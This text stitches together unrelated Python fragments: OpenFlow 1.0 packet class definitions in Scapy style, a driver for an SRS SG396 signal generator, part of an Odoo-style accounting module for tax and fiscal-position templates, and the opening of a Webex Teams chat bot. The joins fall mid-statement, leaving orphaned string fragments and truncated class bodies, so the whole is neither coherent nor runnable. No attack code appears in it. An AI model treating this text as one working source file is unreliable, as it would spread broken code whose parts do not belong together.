class OFPTFlowRemoved(_ofp_header):
name = "OFPT_FLOW_REMOVED"
fields_desc = [ ByteEnumField("version", 0x01, ofp_version),
ByteEnumField("type", 11, ofp_type),
ShortField("len", None),
IntField("xid", 0),
PacketField("match", OFPMatch(), OFPMatch),
LongField("cookie", 0),
ShortField("priority", 0),
ByteEnumField("reason", 0, { 0: "OFPRR_IDLE_TIMEOUT",
1: "OFPRR_HARD_TIMEOUT",
2: "OFPRR_DELETE" }),
XByteField("pad1", 0),
IntField("duration_sec", 0),
IntField("duration_nsec", 0),
ShortField("idle_timeout", 0),
XShortField("pad2", 0),
LongField("packet_count", 0),
LongField("byte_count", 0) ]
overload_fields = {TCP: {"dport": 6653}}
class OFPTPortStatus(_ofp_header):
name = "OFPT_PORT_STATUS"
fields_desc = [ ByteEnumField("version", 0x01, ofp_version),
ByteEnumField("type", 12, ofp_type),
ShortField("len", None),
IntField("xid", 0),
ByteEnumField("reason", 0, { 0: "OFPPR_ADD",
1: "OFPPR_DELETE",
2: "OFPPR_MODIFY" }),
XBitField("pad", 0, 56),
PacketField("desc", OFPPhyPort(), OFPPhyPort) ]
overload_fields = {TCP: {"dport": 6653}}
class OFPTPacketOut(_ofp_header):
name = "OFPT_PACKET_OUT"
fields_desc = [ ByteEnumField("version", 0x01, ofp_version),
ByteEnumField("type", 13, ofp_type),
ShortField("len", None),
IntField("xid", 0),
IntEnumField("buffer_id", "NO_BUFFER", ofp_buffer),
ShortEnumField("in_port", "NONE", ofp_port_no),
FieldLenField("actions_len", None, fmt="H", length_of="actions"),
ActionPacketListField("actions", [], Packet,
length_from=lambda pkt:pkt.actions_len),
PacketField("data", None, Ether) ]
overload_fields = {TCP: {"sport": 6653}}
class OFPTFlowMod(_ofp_header):
name = "OFPT_FLOW_MOD"
fields_desc = [ ByteEnumField("version", 0x01, ofp_version),
ByteEnumField("type", 14, ofp_type),
ShortField("len", None),
IntField("xid", 0),
PacketField("match", OFPMatch(), OFPMatch),
LongField("cookie", 0),
ShortEnumField("cmd", 0, { 0: "OFPFC_ADD",
1: "OFPFC_MODIFY",
2: "OFPFC_MODIFY_STRICT",
3: "OFPFC_DELETE",
4: "OFPFC_DELETE_STRICT" }),
ShortField("idle_timeout", 0),
ShortField("hard_timeout", 0),
ShortField("priority", 0),
IntEnumField("buffer_id", "NO_BUFFER", ofp_buffer),
ShortEnumField("out_port", "NONE", ofp_port_no),
FlagsField("flags", 0, 16, [ "SEND_FLOW_REM",
"CHECK_OVERLAP",
"EMERG" ]),
ActionPacketListField("actions", [], Packet,
length_from=lambda pkt:pkt.len-72) ]
overload_fields = {TCP: {"sport": 6653}}
class OFPTPortMod(_ofp_header):
name = "OFPT_PORT_MOD"
fields_desc = [ ByteEnumField("version", 0x01, ofp_version),
ByteEnumField("type", 15, ofp_type),
ShortField("len", None),
IntField("xid", 0),
ShortEnumField("port_no", 0, ofp_port_no),
MACField("hw_addr", "0"),
FlagsField("config", 0, 32, ofp_port_config),
FlagsField("mask", 0, 32, ofp_port_config),
FlagsField("advertise", 0, 32, ofp_port_features),
IntField("pad", 0) ]
overload_fields = {TCP: {"sport": 6653}}
#####################################################
##################### OFPT_STATS ####################
#####################################################
ofp_stats_types = { 0: "OFPST_DESC",
1: "OFPST_FLOW",
2: "OFPST_AGGREGATE",
3: "OFPST_TABLE",
4: "OFPST_PORT",
5: "OFPST_QUEUE",
65535: "OFPST_VENDOR" }
class OFPTStatsRequestDesc(_ofp_header):
name = "OFPST_STATS_REQUEST_DESC"
fields_desc = [ ByteEnumField("version", 0x01, ofp_version),
ByteEnumField("type", 16, ofp_type),
ShortField("len", None),
IntField("xid", 0),
ShortEnumField("stats_type", 0, ofp_stats_types),
FlagsField("flags", 0, 16, []) ]
overload_fields = {TCP: {"sport": 6653}}
class OFPTStatsReplyDesc(_ofp_header):
name = "OFPST_STATS_REPLY_DESC"
fields_desc = [ ByteEnumField("version", 0x01, ofp_version),
ByteEnumField("type", 17, ofp_type),
ShortField("len", None),
IntField("xid", 0),
ShortEnumField("stats_type", 0, ofp_stats_types),
FlagsField("flags", 0, 16, []),
StrFixedLenField("mfr_desc", "", 256),
StrFixedLenField("hw_desc", "", 256),
StrFixedLenField("sw_desc", "", 256),
StrFixedLenField("serial_num", "", 32),
StrFixedLenField("dp_desc", "", 256) ]
overload_fields = {TCP: {"dport": 6653}}
class OFPTStatsRequestFlow(_ofp_header):
name = "OFPST_STATS_REQUEST_FLOW"
fields_desc = [ ByteEnumField("version", 0x01, ofp_version),
ByteEnumField("type", 16, ofp_type),
ShortField("len", None),
IntField("xid", 0),
ShortEnumField("stats_type", 1, ofp_stats_types),
FlagsField("flags", 0, 16, []),
PacketField("match", OFPMatch(), OFPMatch),
ByteEnumField("table_id", "ALL", ofp_table),
ByteField("pad", 0),
ShortEnumField("out_port", "NONE", ofp_port_no) ]
overload_fields = {TCP: {"sport": 6653}}
class OFPFlowStats(Packet):
def post_build(self, p, pay):
if self.length is None:
l = len(p)+len(pay)
p = struct.pack("!H", l) + p[2:]
return p + pay
name = "OFP_FLOW_STATS"
fields_desc = [ ShortField("length", None),
ByteField("table_id", 0),
XByteField("pad1", 0),
PacketField("match", OFPMatch(), OFPMatch),
IntField("duration_sec", 0),
IntField("duration_nsec", 0),
ShortField("priority", 0),
ShortField("idle_timeout", 0),
ShortField("hard_timeout", 0),
XBitField("pad2", 0, 48),
LongField("cookie", 0),
LongField("packet_count", 0),
LongField("byte_count", 0),
ActionPacketListField("actions", [], Packet,
length_from=lambda pkt:pkt.length-88) ]
class FlowStatsPacketListField(PacketListField):
@staticmethod
def _get_flow_stats_length(s):
return struct.unpack("!H", s[:2])[0]
def getfield(self, pkt, s):
lst = []
remain = s
while remain:
l = FlowStatsPacketListField._get_flow_stats_length(remain)
current = remain[:l]
remain = remain[l:]
p = OFPFlowStats(current)
lst.append(p)
return remain, lst
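# Example of the parsing logic above (entry sizes are hypothetical): a reply
# carrying two flow-stat entries of 96 and 104 bytes is split by reading the
# leading 2-byte length of each entry, so lst ends up as
#   [OFPFlowStats(<96 bytes>), OFPFlowStats(<104 bytes>)]
# and remain is empty once the buffer is consumed.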
class OFPTStatsReplyFlow(_ofp_header):
name = "OFPST_STATS_REPLY_FLOW"
fields_desc = [ ByteEnumField("version", 0x01, ofp_version),
ByteEnumField("type", 17, ofp_type),
ShortField("len", None),
IntField("xid", 0),
ShortEnumField("stats_type", 1, ofp_stats_types),
FlagsField("flags", 0, 16, []),
FlowStatsPacketListField("flow_stats", [], Packet,
length_from=lambda pkt:pkt.len-12) ]
overload_fields = {TCP: {"dport": 6653}}
class OFPTStatsRequestAggregate(_ofp_header):
name = "OFPST_STATS_REQUEST_AGGREGATE"
fields_desc = [ ByteEnumField("version", 0x01, ofp_version),
ByteEnumField("type", 16, ofp_type),
ShortField("len", None),
IntField("xid", 0),
ShortEnumField("stats_type", 2, ofp_stats_types),
FlagsField("flags", 0, 16, []),
PacketField("match", OFPMatch(), OFPMatch),
ByteEnumField("table_id", "ALL", ofp_table),
ByteField("pad", 0),
ShortEnumField("out_port", "NONE", ofp_port_no) ]
overload_fields = {TCP: {"sport": 6653}}
class OFPTStatsReplyAggregate(_ofp_header):
name = "OFPST_STATS_REPLY_AGGREGATE"
fields_desc = [ ByteEnumField("version", 0x01, ofp_version),
ByteEnumField("type", 17, ofp_type),
ShortField("len", None),
IntField("xid", 0),
| |
# <NAME> <<EMAIL>>, 2008
# <NAME> <<EMAIL>>, 2008
# <NAME> <<EMAIL>>, 2015
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
from instrument import Instrument
import visa
import types
import logging
import numpy as np
import qt
class SRS_SG396(Instrument):
'''
This is the driver for the SRS SG396 Vector Signal Genarator
Usage:
Initialize with
<name> = instruments.create('<name>', 'SRS_SG396', address='<GPIB address>', reset=<bool>)
'''
def __init__(self, name, address, reset=False):
'''
Initializes the SRS_SG396, and communicates with the wrapper.
Input:
name (string) : name of the instrument
address (string) : GPIB address
reset (bool) : resets to default values, default=False
'''
logging.info(__name__ + ' : Initializing instrument SRS_SG396')
Instrument.__init__(self, name, tags=['physical'])
# Add some global constants
self._address = address
self._visainstrument = visa.ResourceManager().open_resource(self._address, timeout=2000) # timeout is in milliseconds
try:
self._visainstrument.read_termination = '\n'
self._visainstrument.write_termination = '\n'
self.MAX_BNC_FREQ = 62.5e6
self.MIN_N_FREQ = 950e3
self.add_parameter('power',
flags=Instrument.FLAG_GETSET|Instrument.FLAG_GET_AFTER_SET,
units='dBm', minval=-110, maxval=16.5, type=types.FloatType)
self.add_parameter('phase',
flags=Instrument.FLAG_GETSET|Instrument.FLAG_GET_AFTER_SET,
units='deg', minval=-360, maxval=360, type=types.FloatType)
self.add_parameter('frequency', format='%.09e',
flags=Instrument.FLAG_GETSET|Instrument.FLAG_GET_AFTER_SET,
units='Hz', minval=0, maxval=6.075e9, type=types.FloatType)
#cache_time=1.) # <-- cache because this is queried a lot when setting other params
self.add_parameter('dc_offset',
flags=Instrument.FLAG_GETSET|Instrument.FLAG_GET_AFTER_SET,
units='V', minval=-1.5, maxval=1.5, type=types.FloatType)
self.add_parameter('idn', flags=Instrument.FLAG_GET, type=types.StringType)
self.add_parameter('temperature', flags=Instrument.FLAG_GET, units='deg C', type=types.FloatType)
self.add_parameter('status',
flags=Instrument.FLAG_GETSET|Instrument.FLAG_GET_AFTER_SET, type=types.StringType,
format_map={'on': 'output on',
'off': 'output off'})
self.add_parameter('modulation',
flags=Instrument.FLAG_GETSET|Instrument.FLAG_GET_AFTER_SET, type=types.IntType,
format_map={-1: 'no modulation',
0: 'AM / ASK',
1: 'FM / FSK',
2: 'phase / PSK',
3: 'sweep',
4: 'pulse',
5: 'blank',
7: 'QAM',
8: 'CPM',
9: 'VSB'})
self.add_parameter('modulation_subtype',
flags=Instrument.FLAG_GETSET|Instrument.FLAG_GET_AFTER_SET, type=types.IntType,
format_map={0: 'analog (no constellation mapping)',
1: 'vector (no constellation mapping)',
2: 'default 1-bit constellation',
3: 'default 2-bit constellation',
4: 'default 3-bit constellation',
5: 'default 4-bit constellation',
6: 'default 5-bit constellation',
7: 'default 6-bit constellation',
8: 'default 7-bit constellation',
9: 'default 8-bit constellation',
10: 'default 9-bit constellation',
11: 'user constellation',
12: 'factory OQPSK constellation',
13: 'factory QPSK constellation',
14: 'factory pi/4 DQPSK constellation',
15: 'factory 3pi/8 8PSK constellation'})
self.add_parameter('external_modulation_coupling',
flags=Instrument.FLAG_GETSET|Instrument.FLAG_GET_AFTER_SET, type=types.IntType,
format_map={0: 'AC (4 Hz high-pass)',
1: 'DC'})
self.add_parameter('pulse_modulation',
flags=Instrument.FLAG_GETSET|Instrument.FLAG_GET_AFTER_SET, type=types.IntType,
format_map={3: 'square',
4: 'noise (PRBS)',
5: 'external',
11: 'user waveform'})
self.add_parameter('pulse_modulation_width', format='%.09e',
flags=Instrument.FLAG_GETSET|Instrument.FLAG_GET_AFTER_SET,
units='s', minval=1e-6, maxval=10., type=types.FloatType)
self.add_parameter('pulse_modulation_period', format='%.09e',
flags=Instrument.FLAG_GETSET|Instrument.FLAG_GET_AFTER_SET,
units='s', minval=1e-6, maxval=10., type=types.FloatType)
self.add_parameter('am_modulation_depth',
flags=Instrument.FLAG_GETSET|Instrument.FLAG_GET_AFTER_SET, units='%', minval=0, maxval=100., type=types.FloatType)
self.add_parameter('timebase',
flags=Instrument.FLAG_GETSET|Instrument.FLAG_GET_AFTER_SET, type=types.IntType,
format_map={0: 'crystal',
1: 'OCXO',
2: 'rubidium',
3: 'external'})
self.add_parameter('noise_mode',
flags=Instrument.FLAG_GETSET|Instrument.FLAG_GET_AFTER_SET, type=types.IntType,
format_map={0: 'optimized for less than 100 kHz from carrier',
1: 'optimized for more than 100 kHz from carrier'})
status_codes ={0: 'normal',
1: '20 MHz PLL unlocked',
2: '100 MHz PLL unlocked',
4: '19 MHz PLL unlocked',
8: '1 GHz PLL unlocked',
16: '4 GHz PLL unlocked',
32: 'no timebase',
64: 'rubidium oscillator unlocked',
128: 'reserved status code',
256: 'modulation overloaded',
512: 'IQ modulation overloaded'}
self.__all_status_combinations = dict(
(status, ', '.join( status_codes[2**j] for j in range(0, 10) if ((status>>j)&1) ))
for status in range(1, 2**10)
)
self.__all_status_combinations[0] = status_codes[0]
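# Example of the decode table built above: a raw status of 48 (= 16 + 32)
# maps to '4 GHz PLL unlocked, no timebase'; 0 stays 'normal'.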
self.add_parameter('status_code',
flags=Instrument.FLAG_GET, type=types.IntType,
format_map=self.__all_status_combinations)
self.add_function('reset')
self.add_function ('get_all')
if (reset):
self.reset()
else:
self.get_all()
except:
self._visainstrument.close()
raise
def reset(self):
'''
Resets the instrument to default values.
'''
logging.info(__name__ + ' : resetting instrument')
self._visainstrument.write('*RST')
self.set_status('off')
self.set_power(-30)
self.get_all()
def self_test(self):
'''
Run the self test and report errors.
'''
logging.info(__name__ + ' : self testing')
errors = self._visainstrument.ask('*TST?')
if errors.strip() != '0':
logging.warn('Self test returned the following errors!:')
assert errors.strip() == '17', 'Self test should return either 0 or 17.'
self.check_for_errors()
self.set_status('off')
self.set_power(-30)
logging.warn('Self test done. The status byte will show that the PLLs came unlocked but that\'s normal (on first read).')
self.get_all()
def check_for_errors(self):
'''
Check the error queue.
'''
for i in range(1000):
err = self._visainstrument.ask('LERR?')
if err.strip() == '0':
return
else:
logging.warn('error_buffer[-%d] = %s (see manual p. 126)', i, err)
qt.msleep(0.2)
def get_all(self):
'''
Reads all implemented parameters.
'''
logging.info(__name__ + ' : get all')
self.get_idn()
self.get_power()
self.get_dc_offset()
self.get_phase()
self.get_frequency()
self.get_status()
self.get_external_modulation_coupling()
self.get_modulation()
self.get_modulation_subtype()
self.get_am_modulation_depth()
self.get_pulse_modulation()
self.get_pulse_modulation_width()
self.get_pulse_modulation_period()
self.get_noise_mode()
self.get_timebase()
self.get_status_code()
self.get_temperature()
self.check_for_errors()
def __to_rounded_string(self, x, decimals, significant_figures):
''' Round x to the specified number of decimals and significant figures.
Output a warning if rounded value is not equal to x. '''
rounded = ('%.{0}e'.format(significant_figures-1)) % ( np.round(x, decimals=decimals) )
if np.abs(float(rounded) - x) > np.finfo(np.float).tiny:
logging.warn('Rounding the requested value (%.20e) to %s (i.e. by %.20e).',
x, rounded, x - float(rounded))
return rounded
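# Example: __to_rounded_string(-29.999, 2, 6) first rounds to 2 decimals
# (giving -30.0), then formats it with 6 significant figures as '-3.00000e+01',
# warning that the requested value was adjusted by 0.001.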
def do_get_idn(self):
'''
Get a string identifying the instrument.
'''
return self._visainstrument.ask('*IDN?')
def do_get_temperature(self):
'''
Temperature of the RF output block in deg C.
'''
return self._visainstrument.ask('TEMP?')
def do_get_power(self):
'''
Reads the power of the signal in dBm.
'''
logging.debug(__name__ + ' : get power')
return float(self._visainstrument.ask('AMPR?'))
def do_set_power(self, amp):
'''
Set the power of the signal in dBm.
'''
p = self.__to_rounded_string(amp, 2, 6)
logging.debug(__name__ + ' : set power to %s' % p)
max_power = min(16.5, 16.5 - (self.get_frequency() - 4e9)/1e9 * 3.25)
if float(p) > max_power:
logging.warn('Trying to set %s dBm but the maximum power at %g Hz is %g dBm',
p, self.get_frequency(), max_power)
if self.get_frequency() >= self.MIN_N_FREQ: self._visainstrument.write('AMPR %s' % p)
if self.get_frequency() <= self.MAX_BNC_FREQ: self._visainstrument.write('AMPL %s' % p)
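# Worked example of the limit above (illustrative): at 6 GHz the allowed maximum is
# min(16.5, 16.5 - (6e9 - 4e9)/1e9 * 3.25) = min(16.5, 10.0) = 10.0 dBm.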
def do_get_dc_offset(self):
'''
Reads the DC offset of the BNC output in V.
'''
logging.debug(__name__ + ' : get dc_offset')
return float(self._visainstrument.ask('OFSL?'))
def do_set_dc_offset(self, off):
'''
Set the DC offset of the BNC output in V.
'''
p = self.__to_rounded_string(off, 2, 6)
logging.debug(__name__ + ' : set dc_offset to %s' % p)
power_in_Vrms = 1.00 * 10**((self.get_power()-13.01) / 20)
max_dc_offset = 1.5 * min(1, 1 - (power_in_Vrms-0.224)/(1-0.224) )
if np.abs(float(p)) > max_dc_offset:
logging.warn('Trying to set %s V but the maximum DC offset at %g dBm AC power is %g V',
p, self.get_power(), max_dc_offset)
self._visainstrument.write('OFSL %s' % p)
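# Worked example of the limit above (illustrative): at +13.01 dBm the AC amplitude is
# 1.00 * 10**((13.01 - 13.01)/20) = 1.0 Vrms, so max_dc_offset collapses to
# 1.5 * min(1, 1 - (1.0 - 0.224)/(1 - 0.224)) = 0 V, i.e. no DC offset is allowed.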
def do_get_phase(self):
'''
Reads the phase of the signal in degrees.
'''
logging.debug(__name__ + ' : get phase')
return float(self._visainstrument.ask('PHAS?'))
def do_set_phase(self, v):
'''
Set the phase of the signal in degrees.
'''
if self.get_frequency() <= 100e6: p = self.__to_rounded_string(v, 2, 10)
elif self.get_frequency() <= 1e9: p = self.__to_rounded_string(v, 1, 10)
else: p = self.__to_rounded_string(v, 0, 10)
logging.debug(__name__ + ' : set phase to %s' % p)
self._visainstrument.write('PHAS %s' % p)
def do_get_frequency(self):
'''
Reads the frequency of the signal in Hz.
'''
logging.debug(__name__ + ' : get frequency')
return float(self._visainstrument.ask('FREQ?'))
def do_set_frequency(self, freq):
'''
Set the frequency in Hz.
'''
logging.debug(__name__ + ' : set frequency to %s' % freq)
self._visainstrument.write('FREQ %s' %
self.__to_rounded_string(freq, decimals=6, significant_figures=17))
def do_get_status(self):
'''
Reads the output status ("on" or "off" for the BNC and N outputs).
'''
logging.debug(__name__ + ' : get status')
stat_l = self._visainstrument.ask('ENBL?').strip() == '1'
stat_r = self._visainstrument.ask('ENBR?').strip() == '1'
return 'BNC %s, N %s' % ('on' if stat_l else 'off', 'on' if stat_r else 'off')
def do_set_status(self, status):
'''
Sets the output status ("on" or "off").
Sets both the BNC and N outputs whenever the frequency allows it.
'''
s = int(bool( (status.lower().strip() in ['1', 'on']) ))
logging.debug(__name__ + ' : set status to %s' % s)
if self.get_frequency() >= self.MIN_N_FREQ: self._visainstrument.write('ENBR %s' % s)
if self.get_frequency() <= self.MAX_BNC_FREQ: self._visainstrument.write('ENBL %s' % s)
def do_get_modulation(self):
'''
Gets the modulation mode (and whether modulation is enabled at all).
'''
if not (self._visainstrument.ask('MODL?').strip() == '1'): return -1
return self._visainstrument.ask('TYPE?')
def do_set_modulation(self, v):
'''
Sets the modulation mode (and turns modulation on), unless v == -1 which disables modulation.
'''
assert v in [-1,0,1,2,3,4,5,7,8,9], 'Unknown modulation type %s (see manual p. 114).' % v
if v != -1: self._visainstrument.write('TYPE %d' % v)
self._visainstrument.write('MODL %d' % (0 if v == -1 else 1))
def do_get_modulation_subtype(self):
invoice is validated.\n"
"Based on Payment: the tax is due as soon as the payment of the invoice is received.")
cash_basis_transition_account_id = fields.Many2one(
comodel_name='account.account.template',
string="Cash Basis Transition Account",
domain=[('deprecated', '=', False)],
help="Account used to transition the tax amount for cash basis taxes. It will contain the tax amount as long as the original invoice has not been reconciled ; at reconciliation, this amount cancelled on this account and put on the regular tax account.")
cash_basis_base_account_id = fields.Many2one(
'account.account.template',
domain=[('deprecated', '=', False)],
string='Base Tax Received Account',
help='Account that will be set on lines created in cash basis journal entry and used to keep track of the tax base amount.')
_sql_constraints = [
('name_company_uniq', 'unique(name, type_tax_use, chart_template_id)', 'Tax names must be unique !'),
]
@api.depends('name', 'description')
def name_get(self):
res = []
for record in self:
name = record.description and record.description or record.name
res.append((record.id, name))
return res
def _get_tax_vals(self, company, tax_template_to_tax):
""" This method generates a dictionary of all the values for the tax that will be created.
"""
# Compute children tax ids
children_ids = []
for child_tax in self.children_tax_ids:
if tax_template_to_tax.get(child_tax.id):
children_ids.append(tax_template_to_tax[child_tax.id])
self.ensure_one()
val = {
'name': self.name,
'type_tax_use': self.type_tax_use,
'amount_type': self.amount_type,
'active': self.active,
'company_id': company.id,
'sequence': self.sequence,
'amount': self.amount,
'description': self.description,
'price_include': self.price_include,
'include_base_amount': self.include_base_amount,
'analytic': self.analytic,
'children_tax_ids': [(6, 0, children_ids)],
'tax_exigibility': self.tax_exigibility,
}
# We add repartition lines if there are some, so that if there are none,
# default_get is called and creates the default ones properly.
if self.invoice_repartition_line_ids:
val['invoice_repartition_line_ids'] = self.invoice_repartition_line_ids.get_repartition_line_create_vals(company)
if self.refund_repartition_line_ids:
val['refund_repartition_line_ids'] = self.refund_repartition_line_ids.get_repartition_line_create_vals(company)
if self.tax_group_id:
val['tax_group_id'] = self.tax_group_id.id
return val
def _generate_tax(self, company):
""" This method generate taxes from templates.
:param company: the company for which the taxes should be created from templates in self
:returns: {
'tax_template_to_tax': mapping between tax template and the newly generated taxes corresponding,
'account_dict': dictionary containing a to-do list with all the accounts to assign on new taxes
}
"""
# default_company_id is needed in context to allow creation of default
# repartition lines on taxes
ChartTemplate = self.env['account.chart.template'].with_context(default_company_id=company.id)
todo_dict = {'account.tax': {}, 'account.tax.repartition.line': {}}
tax_template_to_tax = {}
templates_todo = list(self)
while templates_todo:
templates = templates_todo
templates_todo = []
# create taxes in batch
tax_template_vals = []
for template in templates:
if all(child.id in tax_template_to_tax for child in template.children_tax_ids):
vals = template._get_tax_vals(company, tax_template_to_tax)
tax_template_vals.append((template, vals))
else:
# defer the creation of this tax to the next batch
templates_todo.append(template)
taxes = ChartTemplate._create_records_with_xmlid('account.tax', tax_template_vals, company)
# fill in tax_template_to_tax and todo_dict
for tax, (template, vals) in zip(taxes, tax_template_vals):
tax_template_to_tax[template.id] = tax.id
# Since the accounts have not been created yet, we have to wait before filling these fields
todo_dict['account.tax'][tax.id] = {
'cash_basis_transition_account_id': template.cash_basis_transition_account_id.id,
'cash_basis_base_account_id': template.cash_basis_base_account_id.id,
}
# We also have to delay the assignation of accounts to repartition lines
# The below code assigns the account_id to the repartition lines according
# to the corresponding repartition line in the template, based on the order.
# As we just created the repartition lines, tax.invoice_repartition_line_ids is not well sorted.
# But we can force the sort by calling sort()
all_tax_rep_lines = tax.invoice_repartition_line_ids.sorted() + tax.refund_repartition_line_ids.sorted()
all_template_rep_lines = template.invoice_repartition_line_ids + template.refund_repartition_line_ids
for i in range(0, len(all_template_rep_lines)):
# We assume template and tax repartition lines are in the same order
template_account = all_template_rep_lines[i].account_id
if template_account:
todo_dict['account.tax.repartition.line'][all_tax_rep_lines[i].id] = {
'account_id': template_account.id,
}
if any(template.tax_exigibility == 'on_payment' for template in self):
# When a CoA is being installed automatically and if it is creating account tax(es) whose field `Use Cash Basis`(tax_exigibility) is set to True by default
# (example of such CoA's are l10n_fr and l10n_mx) then in the `Accounting Settings` the option `Cash Basis` should be checked by default.
company.tax_exigibility = True
return {
'tax_template_to_tax': tax_template_to_tax,
'account_dict': todo_dict
}
# Tax Repartition Line Template
class AccountTaxRepartitionLineTemplate(models.Model):
_name = "account.tax.repartition.line.template"
_description = "Tax Repartition Line Template"
factor_percent = fields.Float(string="%", required=True, help="Factor to apply on the account move lines generated from this repartition line, in percents")
repartition_type = fields.Selection(string="Based On", selection=[('base', 'Base'), ('tax', 'of tax')], required=True, default='tax', help="Base on which the factor will be applied.")
account_id = fields.Many2one(string="Account", comodel_name='account.account.template', help="Account on which to post the tax amount")
invoice_tax_id = fields.Many2one(comodel_name='account.tax.template', help="The tax set to apply this repartition on invoices. Mutually exclusive with refund_tax_id")
refund_tax_id = fields.Many2one(comodel_name='account.tax.template', help="The tax set to apply this repartition on refund invoices. Mutually exclusive with invoice_tax_id")
tag_ids = fields.Many2many(string="Financial Tags", relation='account_tax_repartition_financial_tags', comodel_name='account.account.tag', copy=True, help="Additional tags that will be assigned by this repartition line for use in financial reports")
# These last two fields are helpers used to ease the declaration of account.account.tag objects in XML.
# They are directly linked to account.tax.report.line objects, which create corresponding + and - tags
# at creation. This way, we avoid declaring + and - separately every time.
plus_report_line_ids = fields.Many2many(string="Plus Tax Report Lines", relation='account_tax_repartition_plus_report_line', comodel_name='account.tax.report.line', copy=True, help="Tax report lines whose '+' tag will be assigned to move lines by this repartition line")
minus_report_line_ids = fields.Many2many(string="Minus Report Lines", relation='account_tax_repartition_minus_report_line', comodel_name='account.tax.report.line', copy=True, help="Tax report lines whose '-' tag will be assigned to move lines by this repartition line")
@api.model
def create(self, vals):
if vals.get('plus_report_line_ids'):
vals['plus_report_line_ids'] = self._convert_tag_syntax_to_orm(vals['plus_report_line_ids'])
if vals.get('minus_report_line_ids'):
vals['minus_report_line_ids'] = self._convert_tag_syntax_to_orm(vals['minus_report_line_ids'])
if vals.get('tag_ids'):
vals['tag_ids'] = self._convert_tag_syntax_to_orm(vals['tag_ids'])
return super(AccountTaxRepartitionLineTemplate, self).create(vals)
@api.model
def _convert_tag_syntax_to_orm(self, tags_list):
""" Repartition lines give the possibility to directly give
a list of ids to create for tags instead of a list of ORM commands.
This function checks that tags_list uses this syntactic sugar and returns
an ORM-compliant version of it if it does.
"""
if tags_list and all(isinstance(elem, int) for elem in tags_list):
return [(6, False, tags_list)]
return tags_list
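# Example of the shorthand handled above: a plain list of ids such as [12, 15]
# is converted to the ORM "set" command [(6, False, [12, 15])]; a list that already
# contains ORM command tuples is returned unchanged. (The ids are illustrative.)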
@api.constrains('invoice_tax_id', 'refund_tax_id')
def validate_tax_template_link(self):
for record in self:
if record.invoice_tax_id and record.refund_tax_id:
raise ValidationError(_("Tax repartition line templates should apply to either invoices or refunds, not both at the same time. invoice_tax_id and refund_tax_id should not be set together."))
@api.constrains('plus_report_line_ids', 'minus_report_line_ids')
def validate_tags(self):
all_tax_rep_lines = self.mapped('plus_report_line_ids') + self.mapped('minus_report_line_ids')
lines_without_tag = all_tax_rep_lines.filtered(lambda x: not x.tag_name)
if lines_without_tag:
raise ValidationError(_("The following tax report lines are used in some tax repartition template though they don't generate any tag: %s . This probably means you forgot to set a tag_name on these lines.") % str(lines_without_tag.mapped('name')))
def get_repartition_line_create_vals(self, company):
rslt = [(5, 0, 0)]
for record in self:
tags_to_add = self.env['account.account.tag']
tags_to_add += record.plus_report_line_ids.mapped('tag_ids').filtered(lambda x: not x.tax_negate)
tags_to_add += record.minus_report_line_ids.mapped('tag_ids').filtered(lambda x: x.tax_negate)
tags_to_add += record.tag_ids
rslt.append((0, 0, {
'factor_percent': record.factor_percent,
'repartition_type': record.repartition_type,
'tag_ids': [(6, 0, tags_to_add.ids)],
'company_id': company.id,
}))
return rslt
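# Note on the ORM commands built above: the leading (5, 0, 0) clears any existing
# repartition lines on the one2many field, and each (0, 0, {...}) creates a new line
# with the given values when the result is written to the generated tax.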
# Fiscal Position Templates
class AccountFiscalPositionTemplate(models.Model):
_name = 'account.fiscal.position.template'
_description = 'Template for Fiscal Position'
sequence = fields.Integer()
name = fields.Char(string='Fiscal Position Template', required=True)
chart_template_id = fields.Many2one('account.chart.template', string='Chart Template', required=True)
account_ids = fields.One2many('account.fiscal.position.account.template', 'position_id', string='Account Mapping')
tax_ids = fields.One2many('account.fiscal.position.tax.template', 'position_id', string='Tax Mapping')
note = fields.Text(string='Notes')
auto_apply = fields.Boolean(string='Detect Automatically', help="Apply automatically this fiscal position.")
vat_required = fields.Boolean(string='VAT required', help="Apply only if partner has a VAT number.")
country_id = fields.Many2one('res.country', string='Country',
help="Apply only if delivery or invoicing country match.")
country_group_id = fields.Many2one('res.country.group', string='Country Group',
help="Apply only if delivery or invoicing country match the group.")
state_ids = fields.Many2many('res.country.state', string='Federal States')
zip_from = fields.Char(string='Zip Range From')
zip_to = fields.Char(string='Zip Range To')
class AccountFiscalPositionTaxTemplate(models.Model):
_name = 'account.fiscal.position.tax.template'
_description = 'Tax Mapping Template of Fiscal Position'
_rec_name = 'position_id'
position_id = fields.Many2one('account.fiscal.position.template', string='Fiscal Position', required=True, ondelete='cascade')
tax_src_id = fields.Many2one('account.tax.template', string='Tax Source', required=True)
tax_dest_id = fields.Many2one('account.tax.template', string='Replacement Tax')
class AccountFiscalPositionAccountTemplate(models.Model):
_name = 'account.fiscal.position.account.template'
_description = 'Accounts Mapping Template of Fiscal Position'
_rec_name = 'position_id'
position_id = fields.Many2one('account.fiscal.position.template', string='Fiscal Mapping', required=True, ondelete='cascade')
account_src_id = fields.Many2one('account.account.template', string='Account Source', required=True)
account_dest_id = fields.Many2one('account.account.template', string='Account Destination', required=True)
class AccountReconcileModelTemplate(models.Model):
_name = "account.reconcile.model.template"
_description = 'Reconcile Model Template'
# Base fields.
chart_template_id = fields.Many2one('account.chart.template', string='Chart Template', required=True)
name = fields.Char(string='Button Label', required=True)
sequence = fields.Integer(required=True, default=10)
rule_type = fields.Selection(selection=[
('writeoff_button', 'Manually create a write-off on clicked button.'),
('writeoff_suggestion', 'Suggest a write-off.'),
('invoice_matching', 'Match existing invoices/bills.')
], string='Type', default='writeoff_button', required=True)
auto_reconcile = fields.Boolean(string='Auto-validate',
help='Validate the statement line automatically (reconciliation based on your rule).')
to_check = fields.Boolean(string='To Check', default=False, help='This matching rule
from http.server import BaseHTTPRequestHandler, HTTPServer
import logging
import json
import os
import requests
from webexteamssdk import WebexTeamsAPI
# CHAT BOT v3.0.0
# Integration between Cisco Operations Insights & Webex Teams & CMX
# (c) 2019
# <NAME>
# <NAME>
# <NAME>
# <NAME>
#########################################################
## FIXED VARIABLES
# infobot
api = WebexTeamsAPI(access_token='<KEY>')
# Webhook
